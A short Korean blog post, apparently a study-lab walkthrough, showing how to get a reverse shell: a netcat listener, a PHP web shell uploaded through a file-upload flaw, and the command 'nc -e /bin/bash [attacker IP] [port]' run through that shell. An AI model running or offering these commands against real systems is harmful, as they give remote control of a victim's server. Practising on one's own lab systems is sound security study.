본문 바로가기

Web App/Attack

리버스 쉘(Reverse Shell) 실습(with netcat)

1. 공격자 서버 포트 리스닝

nc -l -p [포트번호]

공격자 서버에서 netcat 도구를 활용해 1024번 포트를 리스닝으로 열어 놓는다.

2. 웹 쉘 업로드

파일 업로드 취약점이 있는 개인 홈페이지에

php로 작성된 웹 쉘을 업로드했다.

3. 리버스 쉘 작성

nc -e /bin/bash [공격자 서버 IP] [포트번호]

 

업로드된 웹 쉘에

피해자 서버의 쉘을 공격자의 서버로 전달하는 netcat 명령어를 입력했다.

4. 피해자 서버 장악

공격자 서버에서

피해자 서버의 쉘을 이용할 수 있게 된 모습을 볼 수 있다.

'Web App > Attack' 카테고리의 다른 글

DOM 객체 접근(with JavaScript)  (0) 2024.06.29
Useful JavaScript  (0) 2024.06.29
XSS Sheet  (0) 2024.06.29
KeyLogger 만들기(with JavaScript)  (1) 2024.05.14
쿠키 탈취(with JavaScript)  (0) 2024.05.13